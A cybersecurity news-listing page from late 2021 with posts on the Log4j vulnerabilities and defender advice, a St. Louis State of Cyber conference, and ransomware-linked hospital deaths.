A second log4j vulnerability (CVE-2021-45046) was uncovered on Dec. 15 and has already been patched. In the description, it is stated that the original fix to address CVE-2021-44228 “was incomplete in certain non-default configurations.” The release of log4j 2.16.0 fixed the issue by removing support for message lookup patterns, according to the CVE record.

“The safest thing to do is to upgrade Log4j to a safe version or remove the JndiLookup class from the log4j-core jar,” according to the Apache Log4j Security Vulnerabilities page.

The Cybersecurity and Infrastructure Security Agency (CISA) updated its Vulnerability Guidance page to reflect this second vulnerability. In the update, the agency added: “A remote attacker can exploit this second Log4j vulnerability to cause a denial-of-service (DOS) condition in certain non-default configurations. Note: affected organizations that have already upgraded to Log4j 2.15.0 will need to upgrade to Log4j 2.16.0 to be protected against both CVE-2021-44228 and CVE-2021-45046.”

CISA has issued guidance telling vendors and affected organizations to ensure they’ve now updated to 2.16.0 in order to protect from both vulnerability.

The exploits on log4j are officially getting more sophisticated, according to Microsoft, including state-sponsored hackers from China, Iran, North Korea and Turkey.

This includes Chinese state-sponsored group HAFNUIM (of Microsoft Exchange hack fame), which has been using a DNS service “typically associated with testing activity to fingerprint systems,” Microsoft stated.

“The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers,” Microsoft wrote in its security blog.

One of the targets currently includes Minecraft servers, according to Microsoft. Minecraft is a popular sandbox and survival video game which is regarded as the best-selling video game of all time with nearly 140 million monthly active users.

“Microsoft can confirm public reports of the Khonsari ransomware family being delivered as payload post-exploitation, as discussed by Bitdefender. In Microsoft Defender Antivirus data we have observed a small number of cases of this being launched from compromised Minecraft clients connected to modified Minecraft servers running a vulnerable version of Log4j 2 via the use of a third-party Minecraft mods loader,” Microsoft wrote on its blog post.

Patch Released for Second Log4j Vulnerability

Hot Topics in Cybersecurity Posted by Jen Greco on Dec 16, 2021

This guest post was originally posted on LinkedIn and has been reposted with permission.

If you are just finding out about log4j, here’s what you need to know as a defender:

1. It’s bad. VERY bad. The level of badness can’t be overstated.

2. Don’t think you’re exposed because you don’t use java? I guarantee you at least one of your SaaS vendors/cloud hosting providers/web server providers does.

Java was the most popular programming language of the 90s and early 00s. Hell, it’s still in Stack Overflow’s Top 10 and taught widely in high school & college.

Java is EVERYWHERE.

3. Go through EVERY app, website, and system that you own/use that talks to the internet. This includes self-hosted installs of vendor products and cloud-based services.

Focus on systems that are internet-facing that contain sensitive data, secrets, etc. Focus on older “legacy” vendors.

4. This exploit is not only publicly known, the barrier to entry is LOW. Anyone, including your 5yo playing Minecraft, can use this exploit. It’s as simple as typing in a few characters into a chat box.

5. Don’t think you’re protected because aUthEnTiCatIoN. This exploit is pre-auth. Which means an attacker DOESN’T NEED TO SIGN IN to your web app/system/whatever in order to pop you.

6. Once you finish assessing your hosted apps, vendor systems, etc. – move on to endpoint applications. Java-based apps like WebEx, Minecraft, JetBrains IDEs, Citrix, Filezilla FTP are all
vulnerable. You need to patch, patch, patch. If no patch is available, uninstall.

7. Once you’re done with endpoint apps, make sure all your work from home folks update their personal devices and home routers.

Yes, home routers are susceptible.

I told you it was bad.

Note – don’t rely on your work from home folks to do this right, even with clear instructions.

A lot of them will ignore you.
Prepare for this eventuality.
Make nice with your IT team.
You’re gonna need them.

7. Your immediate reaction will be to set gateway rules to block the exploit string.

Don’t. It won’t work.

There are an infinite number of ways to obfuscate the string. Your regex will be no match, I assure you.

8. Instead, focus on patching. Focus on limiting outbound traffic.
If you can block the LDAP/LDAPS protocol entirely from your outbound traffic, do it.

If you can’t, well, at least block the default LDAP/LDAPS ports. It’s not much, but it’s something.

9. Lastly, communicate with your senior leaders. They should be in the know about this one.

If your leaders ignore you, go to the leadership level above them.

If they ignore you, go to the CEO.

If the CEO ignores you, go to the board.

I told you it was bad.

10. Don’t think this is going to go away any time soon. We’re just starting to get a glimpse of what is being tried out there in the wild.
Buckle up. It’s going to be a wild Christmas.

One final thing to add: if you don’t have edge protection, you can still set firewall rules at the host level. Send outbound traffic to only trusted IPs. This should be a small list.

• • •
To recap:
1. log4j is very bad
2. you are susceptible
3. patch & filter outbound traffic
4. get IT to help you
5. tell your senior leaders

Naomi Buckwalter is an experienced CISO and non-profit director, and is a featured speaker among the Data Connectors Cybersecurity Community. Find her on LinkedIn. 

Ten Things You Must Know About Log4j

Hot Topics in Cybersecurity Posted by Naomi Buckwalter on Dec 14, 2021

The following is a statement shared by the US Secret Service’s Gateway Cyber Task Force at the St. Louis Field Office for the benefit of the public.

DHS – CISA and its partners, through the Joint Cyber Defense Collaborative, are tracking and responding to active, widespread exploitation of a critical remote code execution vulnerability (CVE-2021-44228) affecting Apache Log4j software library versions 2.0-beta9 to 2.14.1. Log4j is very broadly used in a variety of consumer and enterprise services, websites, and applications—as well as in operational technology products—to log security and performance information. An unauthenticated remote actor could exploit this vulnerability to take control of an affected system.

CISA has created a webpage, Apache Log4j Vulnerability Guidance and will actively maintain a community-sourced GitHub repository of publicly available information and vendor-supplied advisories regarding the Log4j vulnerability.

CISA urges organizations to review its Apache Log4j Vulnerability Guidance webpage and upgrade to Log4j version 2.15.0, or apply the appropriate vendor recommended mitigations immediately.

Please follow this link for more information.

CISA Develops Web Page for Apache Log4j Vul …

Hot Topics in Cybersecurity Posted by Data Connectors Newsroom on Dec 14, 2021

For a cybersecurity strategy to succeed, collaboration is vital – whether that’s between teams, organizations or federal agencies.

That was one of many key takeaways at the State of Cyber Conference held in downtown St. Louis on Dec. 1-2.  This event was the result of the country’s top law enforcement agencies coming together to discuss the current cyber threat landscape.

Developed along with the St. Louis InfraGard Alliance and the local offices of the Federal Bureau of Investigation and the US Secret Service, with presentations from the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA), this conference was attended by hundreds of senior cybersecurity professionals from across the region.

“When we first started State of Cyber [in 2016], our goal was to get more partnership between the fed agencies and local resources for the 16 critical infrastructures that InfraGard serves,” said David Wren, president of St. Louis InfraGard.

The conference featured content that was exclusive for attendees only, including a briefing from the FBI on the current state of cybersecurity in the region – namely, its work in combatting ransomware. Attendees also heard from the Department of Homeland Security CISA on how their organizations can partner with the agency to protect themselves against the many threats that are out there.

The two-day conference closed with an inter-agency panel, featuring representatives from:

•       The US Secret Service
•       St. Louis Fusion Center
•       Missouri Department of Public Safety
•       DHS-CISA
•       Missouri State Highway Patrol

During this exclusive session, the experts discussed ways their agencies collaborate with each other and with the public to ensure a high-end cybersecurity infrastructure in the region.

AS SEEN ON TV

It wasn’t just the local cybersecurity pros who took notice of the State of Cyber Conference. Several local news organizations took note of the high-profile speakers list and timeliness of the event.

“The State of Cyber 2021 is a great opportunity for the Secret Service to meet with corporations and security directors to talk about the trends and tactics we’re seeing imposed on the civilian population and also corporations themselves,” US Secret Service Special Agent in Charge Thomas Landry told Fox2Now. Landry is based in the St. Louis field office, and was featured as a key speaker during the conference. His session, given in collaboration with USSS Senior Special Agent Brian Cockrill, was titled “The USSS Cyber Fraud Task Force Model.” This session gave attendees a better understanding of how the agency, which is (in part) designed to fight financial crimes against US citizens, can aid organizations when it comes to avoiding, combatting and reporting cyber crimes. 

Data Connectors CEO Dawn Morrissey highlighted ransomware as one of the biggest cyber threats for KMOV4 viewers regarding one of the biggest cyber threats facing companies of all sizes: ransomware.

“It’s continued to increase, not only the amount of ransom demands, but the frequency of attacks,” she said in the news report. “And it’s affecting everyone from businesses, all the way up to large corporations.”

IN CASE YOU MISSED IT

The Data Connectors team is continuing to partner with InfraGard to present the State of Cyber Virtual Cybersecurity Summit – a complementary, fully online session intended for cyber professionals in the Midwest and Great Lakes region on Dec. 14-15.

This fully virtual experience features similar panels and discussions from the high-profile lineup of speakers, including an interactive inter-agency panel. Registration is still available.

“State of Cyber 2021” Connects Executiv …

Industry News Posted by Jen Greco on Dec 8, 2021

Law Enforcement, Chief Information Security Officers from Region’s Largest Organizations Convene to Get Ahead of Expanding Cyber Threats

ST. LOUIS, MO – November 29, 2021. Data Connectors, representing the largest cybersecurity community in North America, confirmed the details for the State of Cyber 2021 Conference, which will take place December 1st and 2nd, 2021. In partnership with the St. Louis InfraGard Alliance and local field offices of the Federal Bureau of Investigation (FBI) and the US Secret Service, the Chesterfield, MO-based firm will present this year’s in-person and online gatherings, a return from last year’s all-virtual format.

“The United States Secret Service is proud to collaborate with our local, state, and federal partners at the State of Cyber 2021 Conference. Sharing intelligence with them and the organizations responsible for a private infrastructure operating in the St. Louis metropolitan area furthers our investigative mission to thwart crimes against the financial infrastructure of the United States,” stated Thomas Landry, Special Agent in Charge, U.S. Secret Service – St. Louis Field Office.

Landry also headlines the agenda on Wednesday, December 1st.

The conference features prominent Chief Information Security Officer (CISO) executives from the region, as well as industry luminaries, cybersecurity solutions experts, and representatives from government agencies. The two-day agenda represents a combination of the St. Louis Cybersecurity Conference, which has been run annually since 2003, the St. Louis InfraGard Alliance’s State of Cyber event started in 2016, and an annual update for local cyber professionals conducted by the St. Louis Office of the United States Secret Service’ Cyber Fraud Task Force.

Validated professionals in the community that attend the Conference will receive briefings from the Department of Homeland Security (DHS) Cyber Infrastructure Security Association (CISA), and hear from local peer executives from organizations such as Mastercard, First Bank and TikTok.

The Conference will also feature a panel discussion on the State of Cyber Inter-Agency Cooperation, and keynotes from public and private sector executives:

• Richard Quinn, Special Agent in Charge, FBI St. Louis Division
• Erin Hug, Cyber Intelligence Analyst, Cybersecurity Forensics & Intelligence Unit at Missouri State Highway Patrol
• Angela Robinson, Cybersecurity Specialist with the Department of Public Safety (DPS)
• Derek Rieger, Deputy Director of the St. Louis Fusion Center
• Brian Cockrill, Senior Special Agent – Technical Staff Assistant at the United States Secret Service – St. Louis Field Office
• Christopher Cockburn, Cybersecurity Advisor at CISA
• D. Henry, Cyber Security Advisor & Indiana Cybersecurity State Coordinator at CISA

Over 300 members of the Data Connectors Cybersecurity Community are expected to attend this conference. More than 30 community partners and affiliate organizations will also be a part of the gathering including Auth0, Attivo Networks, Darktrace, and Noname Security.

The Conference will take place on Wednesday and Thursday, December 1-2, starting at 8:00 a.m. CST at the Hyatt Regency St. Louis at The Arch, 315 Chestnut St., St. Louis, MO 63102. Registration is FREE for qualified professionals, who can also obtain Continuing Professional Education (CPE) credits for participation.

More information for the Summit can be found at dataconnectors.com/state-of-cyber.

+++++++++

About Data Connectors
Since 1999, Data Connectors (dataconnectors.com) has facilitated collaboration between senior cybersecurity professionals, government/law enforcement agencies, industry luminaries, and solution providers. Today, the community comprises over 650,000 members and 250 Community Partners across North America. Members enjoy informative education, networking and support via award-winning Virtual Summits, live conferences, Web Briefings, and regular communications.

# # #

Note to reporters: If you wish to attend these sessions at no charge, please contact Michael Hiskey, Chief Strategy Officer, at +1.636.778.9495, or info@dataconnectors.com.

“State of Cyber 2021” Brings Together H …

Press Releases Posted by Emily Ramsey on Nov 29, 2021

Cyber incidents kill. They killed before. They will kill again

Ransomware attacks have taken a deadly turn. Hackers have become more organized and sophisticated leading to the first ransomware-related death in September 2019. These threats continue to escalate, making healthcare systems, government operations, and other life-depending organizations prime targets for cybercriminals. However it is no longer just about financial gains, these organizations, when attacked and compromised, threaten lives.

In September 2019, the first ransomware-resulted death occurred at Springhill Medical Center in Alabama. The Wall Street Journal reported on the lawsuit filed by Teiranni Kidd, which will go to court in November 2022. In the article “A Hospital Hit by Hackers, a Baby in Distress: The Case of the First Alleged Ransomware Death” by Kevin Poulsen, Robert McMillan, and Melanie Evans, it was reported that Ms. Kidd was checked in to the hospital in the middle of a ransomware attack. The attack blocked off all medical records along with vital monitors used to track patients’ vitals. Ms. Kidd’s baby was born with the umbilical cord wrapped around her neck, causing brain damage that, nine months later, killed her.

The hospital’s lack of response to the ransomware attack, along with their refusal to tell their patients, and the public at first, what was really going on all begs the question: was Nicko Silar’s death preventable?

First reported to The Wall Street Journal, Joshua Corman, senior adviser for the Cybersecurity and Infrastructure Security Agency (CISA), which is part of the Department of Homeland Security, found evidence that ransomware can lead to dire consequences for hospitals. “We can see that a cyberattack can strain you enough to contribute to excess deaths,” Corman concluded. Had the ransomware attack been paid off, or had the hospital had proper security measures to defend against such attacks, there is a significant chance Nicko Silar could have been saved.

With the rise in such deadly ransomware attacks, insiders have been invited to address Data Connectors’ attendees on their takeaways and best practices in this new threat landscape. One of those experts is Menny Barzilay, CEO at Cytactic. Barzilay addressed the New England Virtual Cybersecurity audience this past August with his Keynote presentation, “Cyber incidents kill. They have killed before. They will kill again.” He discussed how life-threatening cyberthreats should be incorporated into the risk management process in a way that would allow security experts and decision-makers to identify and tackle such threats effectively. He also encouraged attendees to understand why the cyber industry must adopt the right mindset when human lives are at stake and incorporate this notion into their standards, policies, and methodologies.

“Cyber incidents have already cost human lives in the past. And they will soon again. Yet, most cyber professionals haven’t yet fully embraced their responsibility to protect human lives.” he said. “A tectonic shift in the cyber industry is about to happen,” he added.

Menny Barzilay writes on all cybersecurity topics like ransomware in his blog “THINK: CYBER.”

In his blog article “Cyber Kills,” Barzilay lays out the numerous ways in which cyberattacks, especially ransomware, can destroy lives. The most terrifying include, “After an attack on emergency call systems (like 911 in the US) we’ll hear about people getting killed because the emergency responder was not available in time, and after an incident in which pictures will be leaked, we’ll hear about people committing suicide.”

In the same vein, Jaycee Roth, Associate Managing Director of Cyber Risk at Kroll, will present “From the Ransomware Frontlines: R-Rated Takeaways” at the upcoming Canada West Virtual Cybersecurity Summit. With the same warnings as Barzilay, Roth will address encryption, exfiltration, and the rise of the triple extortion and what it means for organizations. She will also instruct which steps precede ransomware detonation along with effective precursors to monitor for and how to act before detonation. These precautions will aim to stop such devastating attacks.

Ransomware attacks have significantly escalated over the last few years. This escalation now impacts lives ranging from exploitation to life-threatening interruptions. For more resources on ransomware, be sure to check out our news page for the latest in cybersecurity news. You can also attend one of the upcoming virtual summits and conferences where ransomware will continue to be a recurring topic among the community.

Ransomware Kills: An insider look at the tr …

Hot Topics in Cybersecurity Posted by Emily Ramsey on Nov 18, 2021